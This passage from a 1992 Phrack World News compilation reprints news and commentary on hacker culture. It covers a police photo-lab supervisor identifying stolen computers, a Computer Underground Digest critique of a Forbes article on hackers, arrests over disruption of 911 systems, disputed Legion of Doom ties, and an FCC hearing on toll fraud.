  5557. unstatistically use him as a representative of the whole community, is just as
  5558. tangled in the contradictions of capitalism as the "system" they supposedly
  5559. loathe.  In fact, they are perhaps more deluded and hypocritical because they
  5560. take a political stance rather than recognizing their crimes for what they are. 
  5561. How can Ed or anyone else in the "phreaking" community take seriously their
  5562. claims of being against big business and evil capitalism when they steal
  5563. people's credit-card and calling-card numbers and use them for their own
  5564. profit?
  5565.  
  5566. The conversation winded down after Ed rhapsodized about the plight of the
  5567. martyred hacker who is left unfairly stigmatized after he is caught, or "taken
  5568. down."
  5569.  
  5570. One time the Feds caught his friend hacking ID codes, had several phone
  5571. companies and police search his house, and had his computer taken away.  Even
  5572. though charges were not filed, Ed complained, "It's not fair."
  5573.  
  5574. That's right, phreak.  They should have thrown him in prison.
  5575. _______________________________________________________________________________
  5576.  
  5577.  Computer Hacker On Side Of Law                              September 23, 1992
  5578.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5579.  by Shelby Grad (Los Angeles Times)(Page B3)
  5580.  
  5581. COSTA MESA, CA -- Philip Bettencourt's formal title is photo lab supervisor for
  5582. the Costa Mesa Police Department.  But on Tuesday afternoon, he served as the
  5583. department's official computer hacker.
  5584.  
  5585. Bettencourt, pounding the keyboard excitedly as other officers looked on, was
  5586. determined to find information within a stolen computer's vast memory that
  5587. would link the machine to its owner.
  5588.  
  5589. So far, he had made matches for all but two of the 26 computers recovered
  5590. earlier this month by police as part of a countywide investigation of stolen
  5591. office equipment.  This would be number 25.
  5592.  
  5593. First, he checked the hard drive's directory, searching for a word-processing
  5594. program that might include a form letter or fax cover sheet containing the
  5595. owner's name, address or phone number.
  5596.  
  5597. When that failed, he tapped into an accounting program, checking for clues on
  5598. the accounts payable menu.
  5599.  
  5600. "Bingo!"  Bettencourt yelled a few minutes into his work.  He found an invoice
  5601. account number to a Fountain Valley cement company that might reveal the
  5602. owner's identity.  Seconds later, he came across the owner's bank credit-card
  5603. number.
  5604.  
  5605. And less than a minute after that, Bettencourt hit pay dirt: The name of a
  5606. Santa Ana building company that, when contacted, revealed that it had indeed
  5607. been the victim of a recent computer burglary.
  5608.  
  5609. "This is great," said Bettencourt, who has been interested in computers for
  5610. nearly two decades now, ever since Radio Shack put its first model on the
  5611. market.  "I love doing this.  This is hacking, but it's in a good sense, not
  5612. trying to hurt someone.  This is helping people."
  5613.  
  5614. Few computer owners who were reunited with their equipment would contest that.
  5615. When Costa Mesa police recovered $250,000 worth of computers, fax machines,
  5616. telephones and other office gadgets, detectives were faced with the difficult
  5617. task of matching machines bearing few helpful identifying marks to their
  5618. owners, said investigator Bob Fate.
  5619.  
  5620. Enter Bettencourt, who tapped into the computers' hard drives, attempting to
  5621. find the documents that would reveal from whom the machines were taken.
  5622.  
  5623. As of Tuesday, all but $50,000 worth of equipment was back in owners' hands.
  5624. Investigators suggested that people who recently lost office equipment call the
  5625. station to determine if some of the recovered gadgetry belongs to them.
  5626.  
  5627. Ironically, the alleged burglars tripped themselves up by not erasing the data
  5628. from the computers before reselling the machines, authorities said.  A college
  5629. student who purchased one of the stolen computers found data from the previous
  5630. owner, whom he contacted.  Police were then called in, and a second "buy" was
  5631. scheduled in which several suspects were arrested, Fate said.
  5632.  
  5633. Three people were arrested September 15 and charged with receiving and
  5634. possessing stolen property.  Police are still searching for the burglars.
  5635.  
  5636. The office equipment was recovered from an apartment and storage facility in
  5637. Santa Ana.
  5638.  
  5639. Bettencourt matched the final stolen computer to its owner before sundown
  5640. Tuesday.
  5641. _______________________________________________________________________________
  5642.  
  5643.  CuD's 1992 MEDIA HYPE Award To FORBES MAGAZINE
  5644.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5645.  by Jim Thomas (Computer Underground Digest)
  5646.  
  5647. In recent years, media depiction of "hackers" has been criticized for
  5648. inaccurate and slanted reporting that exaggerates the public dangers of the
  5649. dread "hacker menace." As a result, CuD annually recognizes the year's most
  5650. egregious example of media hype.
  5651.  
  5652. The 1992 annual CuD GERALDO RIVERA MEDIA HYPE award goes to WILLIAM G. FLANAGAN
  5653. AND BRIGID McMENAMIN for their article "The Playground Bullies are Learning how
  5654. to Type" in the 21 December issue of Forbes (pp 184-189).  The authors improved
  5655. upon last year's winner, Geraldo himself, in inflammatory rhetoric and
  5656. distorted narrative that seems more appropriate for a segment of "Inside
  5657. Edition" during sweeps week than for a mainstream conservative periodical.
  5658.  
  5659. The Forbes piece is the hands-down winner for two reasons.  First, one reporter
  5660. of the story, Brigid McMenamin, was exceptionally successful in creating for
  5661. herself an image as clueless and obnoxious. Second, the story itself was based
  5662. on faulty logic, rumors, and some impressive leaps of induction.  Consider the
  5663. following.
  5664.  
  5665.  
  5666.                          The Reporter: Brigid McMenamin
  5667.  
  5668. It's not only the story's gross errors, hyperbole, and irresponsible distortion
  5669. that deserve commendation/condemnation, but the way that Forbes reporter Brigid
  5670. McMenamin tried to sell herself to solicit information.
  5671.  
  5672. One individual contacted by Brigid McM claimed she called him several times
  5673. "bugging" him for information, asking for names, and complaining because
  5674. "hackers" never called her back.  He reports that she explicitly stated that
  5675. her interest was limited to the "illegal stuff" and the "crime aspect" and was
  5676. oblivious to facts or issues that did not bear upon hackers-as-criminals.
  5677.  
  5678. Some persons present at the November 2600 meeting at Citicorp, which she
  5679. attended, suggested the possibility that she used another reporter as a
  5680. credibility prop, followed some of the participants to dinner after the
  5681. meeting, and was interested in talking only about illegal activities. One
  5682. observer indicated that those who were willing to talk to her might not be the
  5683. most credible informants.  Perhaps this is one reason for her curious language
  5684. in describing the 2600 meeting.
  5685.  
  5686. Another person she contacted indicated that she called him wanting names of
  5687. people to talk to and indicated that because Forbes is a business magazine, it
  5688. only publishes the "truth."  Yet, she seemed not so much interested in "truth,"
  5689. but in finding "evidence" to fit a story.  He reports that he attempted to
  5690. explain that hackers generally are interested in Unix and she asked if she
  5691. could make free phone calls if she knew Unix.  Although the reporter stated to
  5692. me several times that she had done her homework, my own conversation with her
  5693. contradicted her claims, and if the reports of others are accurate, here claims
  5694. of preparation seem disturbingly exaggerated.
  5695.  
  5696. I also had a rather unpleasant exchange with Ms. McM.  She was rude, abrasive,
  5697. and was interested in obtaining the names of "hackers" who worked for or as
  5698. "criminals." Her "angle" was clearly the hacker-as-demon.  Her questions
  5699. suggested that she did not understand the culture about which she was writing.
  5700. She would ask questions and then argue about the answer, and was resistant to
  5701. any "facts" or responses that failed to focus on "the hacker criminal." She
  5702. dropped Emmanuel Goldstein's name in a way that I interpreted as indicating a
  5703. closer relationship than she had--an incidental sentence, but one not without
  5704. import -- which I later discovered was either an inadvertently misleading
  5705. choice of words or a deliberate attempt to deceptively establish credentials. 
  5706. She claimed she was an avowed civil libertarian.  I asked why, then, she didn't
  5707. incorporate some of those issues. She invoked publisher pressure.  Forbes is a
  5708. business magazine, she said, and the story should be of interest to readers.
  5709. She indicated that civil liberties weren't related to "business."  She struck
  5710. me as exceptionally ill-informed and not particularly good at soliciting
  5711. information.  She also left a post on Mindvox inviting "hackers" who had been
  5712. contacted by "criminals" for services to contact her.
  5713.  
  5714.      >Post: 150 of 161
  5715.      >Subject: Hacking for Profit?
  5716.      >From: forbes (Forbes Reporter)
  5717.      >Date: Tue, 17 Nov 92 13:17:34 EST
  5718.      >
  5719.      >Hacking for Profit?  Has anyone ever offered to pay you (or
  5720.      >a friend) to get into a certain system and alter, destroy or
  5721.      >retrieve information?  Can you earn money hacking credit
  5722.      >card numbers, access codes or other information? Do you know
  5723.      >where to sell it?  Then I'd like to hear from you.  I'm
  5724.      >doing research for a magazine article.  We don't need you
  5725.      >name.  But I do want to hear your story.  Please contact me
  5726.      >Forbes@mindvox.phantom.com.
  5727.  
  5728. However, apparently she wasn't over-zealous about following up her post or
  5729. reading the Mindvox conferences.  When I finally agreed to send her some
  5730. information about CuD, she insisted it be faxed rather than sent to Mindvox
  5731. because she was rarely on it.  Logs indicate that she made only six calls to
  5732. the board, none of which occurred after November 24.
  5733.  
  5734. My own experience with the Forbes reporter was consistent with those of others. 
  5735. She emphasized "truth" and "fact-checkers," but the story seems short on both. 
  5736. She emphasized explicitly that her story would *not* be sensationalistic. She
  5737. implied that she wanted to focus on criminals and that the story would have the
  5738. effect of presenting the distinction between "hackers" and real criminals.
  5739. Another of her contacts also appeared to have the same impression.  After our
  5740. less-than-cordial discussion, she reported it to the contact, and he attempted
  5741. to intercede on her behalf in the belief that her intent was to dispel many of
  5742. the media inaccuracies about "hacking."  If his interpretation is correct, then
  5743. she deceived him as well, because her portrayal of him in the story was
  5744. unfavorably misleading.
  5745.  
  5746. In CuD 4.45 (File #3), we ran Mike Godwin's article on "How to Talk to the
  5747. Press," which should be required reading. His guidelines included:
  5748.  
  5749.      1) TRY TO THINK LIKE THE REPORTER YOU'RE TALKING TO.
  5750.      2) IF YOU'RE GOING TO MEET THE REPORTER IN PERSON, TRY TO
  5751.         BRING SOMETHING ON PAPER.
  5752.      3) GIVE THE REPORTER OTHER PEOPLE TO TALK TO, IF POSSIBLE.
  5753.      4) DON'T ASSUME THAT THE REPORTER WILL COVER THE STORY THE WAY
  5754.         YOU'D LIKE HER TO.
  5755.  
  5756. Other experienced observers contend that discussing "hacking" with the press
  5757. should be avoided unless one knows the reporter well or if the reporter has
  5758. established sufficient credentials as accurate and non-sensationalist.  Using
  5759. these criteria, it will probably be a long while before any competent
  5760. cybernaught again speaks to Brigid McMenamin.
  5761.  
  5762.  
  5763.                                    The Story
  5764.  
  5765. Rather than present a coherent and factual story about the types of computer
  5766. crime, the authors instead make "hackers" the focal point and use a narrative
  5767. strategy that conflates all computer crime with "hackers."
  5768.  
  5769. The story implies that Len Rose is part of the "hacker hood" crowd.  The lead
  5770. reports Rose's prison experience and relates his feeling that he was "made an
  5771. example of" by federal prosecutors.  But, asks the narrative, if this is so,
  5772. then why is the government cracking down? Whatever else one might think of Len
  5773. Rose, no one ever has implied that he as a "playground bully" or "hacker hood." 
  5774. The story also states that 2600 Magazine editor Emmanuel Goldstein "hands
  5775. copies <of 2600> out free of charge to kids.  Then they get arrested." (p. 188-
  5776. -a quote attributed to Don Delaney), and distorts (or fabricates) facts to fit
  5777. the slant:
  5778.  
  5779.      According to one knowledgeable source, another hacker brags
  5780.      that he recently found a way to get into Citibank's
  5781.      computers. For three months he says he quietly skimmed off a
  5782.      penny or so from each account. Once he had $200,000, he quit.
  5783.      Citibank says it has no evidence of this incident and we
  5784.      cannot confirm the hacker's story.  But, says computer crime
  5785.      expert Donn Parker of consultants SRI International: "Such a
  5786.      'salami attack' is definitely possible, especially for an
  5787.      insider" (p. 186).
  5788.  
  5789. Has anybody calculated how many accounts one would have to "skim" a few pennies
  5790. from before obtaining $200,000?  At a dime apiece, that's over 2 million.  If
  5791. I'm figuring correctly, at one minute per account, 60 accounts per minute non-
  5792. stop for 24 hours a day all year, it would take nearly 4 straight years of on-
  5793. line computer work for an out-sider.  According to the story, it took only 3
  5794. months.  At 20 cents an account, that's over a million accounts.
  5795.  
  5796. Although no names or evidence are given, the story quotes Donn Parker of SRI as
  5797. saying that the story is a "definite possibility."  Over the years, there have
  5798. been cases of skimming, but as I remember the various incidents, all have been
  5799. inside jobs and few, if any, involved hackers.  The story is suspiciously
  5800. reminiscent of the infamous "bank cracking" article published in Phrack as a
  5801. spoof several years ago.
  5802.  
  5803. The basis for the claim that "hacker hoods" (former "playground bullies") are
  5804. now dangerous is based on a series of second and third-hand rumors and myths.
  5805. The authors then list from "generally reliable press reports" a half-dozen or
  5806. so non-hacker fraud cases that, in context, would seem to the casual reader to
  5807. be part of the "hacker menace." I counted in the article at least 24 instances
  5808. of half-truths, inaccuracies, distortions, questionable/spurious links, or
  5809. misleading claims that are reminiscent of 80s media hype. For example, the
  5810. article attributes to Phiber Optik counts in the MOD indictment that do not
  5811. include him, misleads on the Len Rose indictment and guilty plea, uses second
  5812. and third hand information as "fact" without checking the reliability, and
  5813. presents facts out of context (such as attributing the Morris Internet worm to
  5814. "hackers).
  5815.  
  5816. Featured as a key "hacker hood" is "Kimble," a German hacker said by some to be
  5817. sufficiently media-hungry and self-serving that he is ostracized by other
  5818. German hackers. His major crime reported in the story is hacking into PBXes.
  5819. While clearly wrong, his "crime" hardly qualifies him for the "hacker
  5820. hood/organized crime" danger that's the focus of the story. Perhaps he is
  5821. engaged in other activities unreported by the authors, but it appears he is
  5822. simply a run-of-the-mill petty rip-off artist. In fact, the authors do not make
  5823. much of his crimes. Instead, they leap to the conclusion that "hackers" do the
  5824. same thing and sell the numbers "increasingly" to criminals without a shred of
  5825. evidence for the leap.  To be sure the reader understands the menace, the
  5826. authors also invoke unsubstantiated images of a hacker/Turkish Mafia connection
  5827. and suggest that during the Gulf war, one hacker was paid "millions" to invade
  5828. a Pentagon computer and retrieve information from a spy satellite (p. 186).
  5829.  
  5830. Criminals use computers for crime. Some criminals may purchase numbers from
  5831. others. But the story paints a broader picture, and equates all computer crime
  5832. with "hacking."  The authors' logic seems to be that if a crime is committed
  5833. with a computer, it's a hacking crime, and therefore computer crime and
  5834. "hackers" are synonymous.  The story ignores the fact that most computer crime
  5835. is an "inside job" and it says nothing about the problem of security and how
  5836. the greatest danger to computer systems is careless users.
  5837.  
  5838. One short paragraph near the end mentions the concerns about civil liberties,
  5839. and the next paragraph mentions that EFF was formed to address these concerns.
  5840. However, nothing in the article articulates the bases for these concerns.
  5841. Instead, the piece promotes the "hacker as demon" mystique quite creatively.
  5842.  
  5843. The use of terms such as "new hoods on the block," "playground bullies," and
  5844. "hacker hoods" suggests that the purpose of the story was to find facts to fit
  5845. a slant.
  5846.  
  5847. In one sense, the authors might be able to claim that some of their "facts"
  5848. were accurate.  For example, the "playground bullies" phrase is attributed to
  5849. Cheshire Catalyst.  "Gee, *we* didn't say it!"  But, they don't identify
  5850. whether it's the original CC or not.  The phrase sounds like a term used in
  5851. recent internecine "hacker group" bickering, and if this was the context, it
  5852. hardly describes any new "hacker culture."  Even so, the use of the phrase
  5853. would be akin to a critic of the Forbes article referring to it as the product
  5854. of "media whores who are now getting paid for doing what they used to do for
  5855. free," and then applying the term "whores" to the authors because, hey, I
  5856. didn't make up the term, somebody else did, and I'm just reporting (and using
  5857. it as my central metaphor) just the way it was told to me.  However, I suspect
  5858. that neither Forbes' author would take kindly to being called a whore because
  5859. of the perception that they prostituted journalistic integrity for the pay-off
  5860. of a sexy story.  And this is what's wrong with the article: The authors take
  5861. rumors and catch-phrases, "merely report" the phrases, but then construct
  5862. premises around the phrases *as if* they were true with little (if any)
  5863. evidence.  They take an unconfirmed "truth" (where are fact checkers when you
  5864. need them) or an unrelated "fact" (such as an example of insider fraud) and
  5865. generalize from a discrete fact to a larger population. The article is an
  5866. excellent bit of creative writing.
  5867.  
  5868.  
  5869.                             Why Does It All Matter?
  5870.  
  5871. Computer crime is serious, costly, and must not be tolerated.  Rip-off is no
  5872. joke.  But, it helps to understand a problem before it can be solved, and lack
  5873. of understanding can lead to policies and laws that are not only ineffective,
  5874. but also a threat to civil liberties.  The public should be accurately informed
  5875. of the dangers of computer crime and how it can be prevented. However, little
  5876. will be served by creating demons and falsely attributing to them the sins of
  5877. others.  It is bad enough that the meaning" of the term "hacker" has been used
  5878. to apply both to both computer delinquents and creative explorers without also
  5879. having the label extended to include all other forms of computer criminals as
  5880. well.
  5881.  
  5882. CPSR, the EFF, CuD, and many, many others have worked, with some success, to
  5883. educate the media about both dangers of computer crime and the dangers of
  5884. inaccurately reporting it and attributing it to "hackers."  Some, perhaps most,
  5885. reporters take their work seriously, let the facts speak to them, and at least
  5886. make a good-faith effort not to fit their "facts" into a narrative that--by one
  5887. authors' indication at least -- seems to have been predetermined.
  5888.  
  5889. Contrary to billing, there was no evidence in the story, other than
  5890. questionable rumor, of "hacker" connection to organized crime.  Yet, this type
  5891. of article has been used by legislators and some law enforcement agents to
  5892. justify a "crackdown" on conventional hackers as if they were the ultimate
  5893. menace to society.  Forbes, with a paid circulation of over 735,000 (compared
  5894. to CuDs unpaid circulation of only 40,000), reaches a significant and
  5895. influential population.  Hysterical stories create hysterical images, and these
  5896. create hysteria-based laws that threaten the rights of law-abiding users.  When
  5897. a problem is defined by irresponsibly produced images and then fed to the
  5898. public, it becomes more difficult to overcome policies and laws that restrict
  5899. rights in cyberspace.
  5900.  
  5901. The issue is not whether "hackers" are or are not portrayed favorably.  Rather,
  5902. the issue is whether images reinforce a witch-hunt mentality that leads to the
  5903. excesses of Operation Sun Devil, the Steve Jackson Games fiasco, or excessive
  5904. sentences for those who are either law-abiding or are set up as scapegoats. 
  5905. The danger of the Forbes article is that it contributes to the persecution of
  5906. those who are stigmatized not so much for their acts, but rather for the signs
  5907. they bear.
  5908. _______________________________________________________________________________
  5909.                                 ==Phrack Inc.==
  5910.  
  5911.                   Volume Four, Issue Forty-One, File 13 of 13
  5912.  
  5913.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5914.               PWN                                             PWN
  5915.               PWN              Phrack World News              PWN
  5916.               PWN                                             PWN
  5917.               PWN           Issue 41 / Part 3 of 3            PWN
  5918.               PWN                                             PWN
  5919.               PWN        Compiled by Datastream Cowboy        PWN
  5920.               PWN                                             PWN
  5921.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5922.  
  5923.  
  5924.  Boy, 15, Arrested After 911 Paralyzed By Computer Hacker       October 7, 1992
  5925.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5926.  by Caroline Mallan (The Toronto Star)(Page A22)
  5927.  
  5928. A 15-year-old boy has been arrested after a hacker pulling computer pranks
  5929. paralyzed Metro's emergency 911 service.
  5930.  
  5931. Police with Metro's major crime unit investigated the origin of countless calls
  5932. placed to the 911 service from mid-July through last month.
  5933.  
  5934. The calls were routed to emergency services in the Etobicoke area, said
  5935. Detective Willie Johnston, who led the investigation.
  5936.  
  5937. Phony medical emergency calls were reported and police, fire and ambulance
  5938. crews were dispatched on false alarms.  On one occasion, the computer hacker
  5939. managed to tie up the entire 911 service in Metro -- making it unavailable for
  5940. true emergencies.
  5941.  
  5942. Police were not sure last night how long the system was shut down for but
  5943. Johnston said the period was considerable.
  5944.  
  5945. Staff Sergeant Mike Sale warned hackers that phony calls can be traced.
  5946.  
  5947. "A criminal abuse of the 911 emergency system will result in a criminal
  5948. investigation and will result in an arrest," Sale said, adding police had only
  5949. been investigating this hacker for a few weeks before they came up with a
  5950. suspect.
  5951.  
  5952. Bell Canada investigators helped police to trace the origin of the calls and
  5953. officers yesterday arrested a teen while he was in his Grade 11 class at a
  5954. North York high school.
  5955.  
  5956. Two computers were seized from the boy's home and will be sent to Ottawa to be
  5957. analyzed.
  5958.  
  5959. Johnston said police are concerned that other hackers may also be able to halt
  5960. the 911 service, since the computer technology used was fairly basic, although
  5961. the process of rerouting the calls from a home to the Etobicoke emergency lines
  5962. was very complex.
  5963.  
  5964. The calls went via computer modem through two separate phone systems in major
  5965. U.S. cities before being sent back to Canada, Johnston explained.
  5966.  
  5967. The suspect, who cannot be named under the Young Offenders Act, is charged with
  5968. theft of telecommunications, 24 counts of mischief and 10 counts of conveying
  5969. false messages.
  5970.  
  5971. He was released from custody and will appear in North York youth court November
  5972. 6, police said.
  5973.  
  5974. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5975.  
  5976.  Police Say They've Got Hackers' Number                         October 8, 1992
  5977.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5978.  by John Deverell (The Toronto Star)(Page A8)
  5979.  
  5980.       Hackers, take note.  Metro police and Ma Bell are going to get you.
  5981.  
  5982. A young North York computer freak accused of launching 10 false medical alerts
  5983. to 911 this summer may have learned -- the hard way -- that his telephone
  5984. tricks weren't beating the pros.
  5985.  
  5986. Police arrived with a search warrant at the home of the 15-year-old, arrested
  5987. him and carted away his computer.
  5988.  
  5989. He's charged with 10 counts of conveying false messages, 24 counts of mischief,
  5990. and theft of telecommunications.
  5991.  
  5992. Inspector Bill Holdridge, of 911 emergency services, said the false alarms in
  5993. July and August never posed any technical problem to his switchboard but
  5994. resulted in wild goose chases for the police, fire and ambulance services.
  5995.  
  5996. "Those resources weren't available for real alarms, which could have been a
  5997. serious problem," Holdridge said.
  5998.  
  5999. The 911 service, quartered at 590 Jarvis Street, gets about 7,000 calls a day,
  6000. of which 30% warrant some kind of emergency response.
  6001.  
  6002. Normally, a computerized tracing system takes only seconds to provide the
  6003. address and number of the telephone from which a call originates -- unless the
  6004. point of origin has been somehow disguised.
  6005.  
  6006. Apparently the 911 prankster got into the telephone system illegally and routed
  6007. his calls through several U.S. networks before bringing them back to Toronto.
  6008.  
  6009. Detective Willie Johnston said the boy's parents were stunned when police
  6010. arrived.  "They really didn't have a clue what was going on," said Johnston.
  6011.  
  6012. The false emergencies reported were nowhere near the accused boy's home.
  6013. "Without condoning it, you could understand it if he were sitting around the
  6014. corner watching the flashing lights," said Johnston.  "But they were miles
  6015. away. It defies logic."
  6016.  
  6017. Neither Johnston nor Holdridge would explain how they and Bell security finally
  6018. traced the false alarms. "That might just make other hackers try to figure out
  6019. another way," Holdridge said.
  6020.  
  6021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6022.  
  6023.  Hackers Targeted 911 Systems, Police Say                      October 10, 1992
  6024.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6025.  Taken from United Press International
  6026.  
  6027. Authorities expect to make more arrests after penetrating a loose network of
  6028. computer hackers called the "Legion of Doom" they say tapped into corporate
  6029. phone lines to call 911 systems nationwide with the intent of disrupting
  6030. emergency services.
  6031.  
  6032. Prosecutors from Virginia, New Jersey and Maryland -- in conjunction with
  6033. investigators from two telephone companies -- traced some of the hackers and
  6034. closed in on three homes in two states.
  6035.  
  6036. A 23-year-old Newark, New Jersey man was arrested early on October 9th.  He
  6037. faces several charges, including fraud.  Other arrests are expected in two
  6038. Maryland locations.
  6039.  
  6040. The suspect, known by several aliases and identified by authorities only as
  6041. Maverick, told investigators the group's intent was "to attempt to penetrate
  6042. the 911 computer systems and infect them with viruses to cause havoc," said
  6043. Captain James Bourque of the Chesterfield County police in Virginia.
  6044.  
  6045. The probe is just beginning, according to Bourque.  "Quite honestly, I think
  6046. it's only the tip of the iceberg," he said.
  6047.  
  6048. The hackers first penetrate the phone lines of large companies or pay phones,
  6049. then use those connections to call 911 lines, Bourque said.  The hackers
  6050. usually make conference calls to other 911 services in other cities, tying up
  6051. communications in several locations simultaneously.
  6052.  
  6053. "One time we were linked up with Toronto and Los Angeles jurisdictions,"
  6054. Bourque said.  "And none of us could disconnect."
  6055.  
  6056. Sometimes as many five hackers would be on the line and would make false calls
  6057. for help.  Communications officers, unable to stop the calls, would have to
  6058. listen, then try to persuade the officers in other locales "that the call
  6059. wasn't real," Bourque said.
  6060.  
  6061. "Obviously, there's a real potential for disastrous consequences," he said.
  6062.  
  6063. One phone bill charged to a company in Minnesota indicated the scope of the
  6064. problem.  The company discovered in a 30-day period that it had been charged
  6065. with more than $100,000 in phone calls generated by the hackers, according to
  6066. Bourque.
  6067.  
  6068. "I'm sure there are a multitude of other jurisdictions across the country
  6069. having the same problems," Bourque said.
  6070.  
  6071. People identifying themselves as members of the "Legion of Doom" -- which also
  6072. is the name of a pro wresting team -- have called a Richmond, Virginia
  6073. television station and ABC in New York in an attempt to get publicity, Bourque
  6074. said.
  6075.  
  6076. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6077.  
  6078.  More On 911 "Legion Of Doom" Hacking Case                     October 20, 1992
  6079.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6080.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  6081.  
  6082. NEW YORK CITY -- In a discussion with Newsbytes, Sgt. Kurt Leonard of the
  6083. Chesterfield County, Virginia Police Department has disclosed further
  6084. information concerning the on-going investigation of alleged 911 disruption
  6085. throughout the eastern seaboard of the United States by individuals purporting
  6086. to be members of the hacker group "The Legion of Doom" (LOD).
  6087.  
  6088. Leonard identified the individual arrested in Newark, New Jersey, previously
  6089. referred to only as "Maverick," as Scott Maverick, 23.  Maverick has been
  6090. charged with terroristic threats, obstruction of a government function, and
  6091. illegal access to a computer.  He is presently out on bail.
  6092.  
  6093. Leonard said that David Pluchino, 22, was charged to the same counts as
  6094. Maverick and an additional count of the possession of burglary tools.  Leonard
  6095. said that Pluchino, the subject of a 1990 Secret Service "search and seizure"
  6096. action under the still on-going "Operation SunDevil" investigation," possessed
  6097. information linking him with members of the Legion of Doom.
  6098.  
  6099. The Legion of Doom connection has become the subject of controversy within the
  6100. online community.  Although Maverick has been quoted as saying that he is a
  6101. member of the group and that the group's intent was "to attempt to penetrate
  6102. the 911 computer systems and inflect them with viruses to cause havoc," members
  6103. of the group have disavowed any connection with those arrested.
  6104.  
  6105. "Lex Luthor," one of the original members of the group, told Newsbytes when the
  6106. initial report of the arrests became public: "As far as I am concerned the LOD
  6107. has been dead for a couple of years, never to be revived.  Maverick was never
  6108. in LOD.  There have been 2 lists of members (one in Phrack and another in the
  6109. LOD tj) and those lists are the final word on membership."
  6110.  
  6111. He added, "We obviously cannot prevent copy-cats from saying they are in LOD. 
  6112. When there was an LOD, our goals were to explore and leave systems as we found
  6113. them.  The goals were to expose security flaws so they could be fixed before
  6114. REAL criminals and vandals such as this Maverick character could do damage.  If
  6115. this Maverick character did indeed disrupt E911 service he should be not only
  6116. be charged with computer trespassing but also attempted murder.  911 is serious
  6117. business."
  6118.  
  6119. Lex Luthor's comments, made before the names of the arrested were released,
  6120. were echoed by Chris Goggans, aka "Erik Bloodaxe," and Mark Abene, aka "Phiber
  6121. Optik," both ex-LOD members, and by Craig Neidorf who chronicled the membership
  6122. of LOD in his electronic publication "Phrack."
  6123.  
  6124. When the names of the arrested became public, Newsbytes again contacted Lex
  6125. Luthor to see if the names were familiar.  Luthor replied: "Can't add anything,
  6126. I never heard of them."
  6127.  
  6128. Phiber Optik, a New York resident, told Newsbytes that he remembered Pluchino
  6129. as a person that ran a computer "chat" system called "Interchat" based in New
  6130. Jersey.  "They never were LOD members and Pluchino was not known as a computer
  6131. hacker.  It sounds as though they were LOD wanabees who are now, by going to
  6132. jail, going to get the attention they desire," he said.
  6133.  
  6134. A law enforcement official, familiar with the SunDevil investigation of
  6135. Pluchino, agreed with Phiber, saying, "There was no indication of any
  6136. connection with the Legion of Doom."  The official, speaking under the
  6137. condition of anonymity, also told Newsbytes that the SunDevil investigation of
  6138. Pluchino is still proceeding and, as such, no comment can be made.
  6139.  
  6140. Leonard also told Newsbytes that the investigation has been a joint effort of
  6141. New Jersey, Maryland, and Virginia police departments and said that, in
  6142. conjunction with the October 9th 2:00 AM arrests of Pluchino and Maverick, a
  6143. simultaneous "search and seizure" operation was carried out at the Hanover,
  6144. Maryland home of Zohar Shif, aka "Zeke," a 23 year-old who had also been the
  6145. subject of a SunDevil search and seizure.
  6146.  
  6147. Leonard also said that, in addition to computers taken from Pluchino, material
  6148. was found "establishing a link to the Legion of Doom."  Told of the comments by
  6149. LOD members that the group did not exist anymore, Leonard said "While the
  6150. original members may have gone on to other things, these people say they are
  6151. the LOD and some of them have direct connection to LOD members and have LOD
  6152. materials."
  6153.  
  6154. Asked by Newsbytes to comment on Leonard's comments, Phiber Optik said "The
  6155. material he's referring to is probably text files that have been floating
  6156. around BBS's for years, Just because someone has downloaded the files certainly
  6157. doesn't mean that they are or ever were connected with LOD."
  6158. _______________________________________________________________________________
  6159.  
  6160.  Complaints On Toll Fraud Aired at FCC En Banc Hearing         October 13, 1992
  6161.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6162.  by Art Brodsky (Communications Daily)(Page 1)
  6163.  
  6164. Customers of PBX manufacturers told the Federal Communications Commission (FCC)
  6165. they shouldn't be liable for toll fraud losses incurred because vendors never
  6166. told them of capabilities of their equipment that left companies open to
  6167. electronic theft.  Their case was buttressed by one of country's leading toll-
  6168. fraud investigators, who told day-long en banc hearing that customers shouldn't
  6169. have to pay if they're victimized.  Donald Delaney of the New York State Police
  6170. said toll fraud "is the only crime I know where the victims are held liable." 
  6171. Toll fraud losses have been estimated to run into billions of dollars.
  6172.  
  6173. Commission's look at toll fraud came in context of what FCC can do to prevent
  6174. or lessen problem.  Comr. Marshall said Commission's job would be to apportion
  6175. liability between vendors and customers.  Comr. Duggan, who has been leader on
  6176. issue at Commission, said toll fraud was "hidden degenerative disease on the
  6177. body of business."  He focused on insurance solution to problem, along with
  6178. sharing of liability.  There are cases pending at FCC filed by AT&T customers
  6179. that deal with sharing of liability, and whether common carriers are protected
  6180. by tariffs from paying customers for losses.  Witnesses told Commission it was
  6181. hard to find any law enforcement agency interested in problem, from local
  6182. police to FBI, in addition to difficulties with vendors.  U.S. Secret Service
  6183. has statutory responsibility over toll fraud, said attorney William Cook, who
  6184. testified in afternoon session.  There was general agreement that more customer
  6185. education was needed to prevent fraud, policy endorsed by Northern Telecom,
  6186. which has active customer education program.
  6187.  
  6188. AT&T came in for particular criticism in morning session as users said company
  6189. was insensitive to toll fraud problems.  Thomas Mara, executive vice-president
  6190. Leucadia National Corp., whose company suffered $300,000 in toll fraud, said he
  6191. "had a hell of a time getting anybody at AT&T to pay attention" to problems his
  6192. company was encountering.  Mara said his company saw level of 800 calls rise to
  6193. 10,448 from 100.  He said AT&T was supposed to notify users if there was any
  6194. "dramatic increase in volume, yet we were not notified of a thousandfold
  6195. increase in 800 number usage nor were we informed of an increase from a few
  6196. hours a month in international calls to thousands of hours by AT&T, only after
